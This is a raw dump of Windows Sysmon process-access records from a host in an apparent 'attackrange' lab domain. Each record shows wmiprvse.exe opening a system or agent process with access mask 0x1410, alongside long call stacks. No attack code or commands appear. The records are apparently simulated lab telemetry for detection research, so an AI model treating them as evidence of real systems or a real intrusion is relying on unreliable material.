15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.381{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 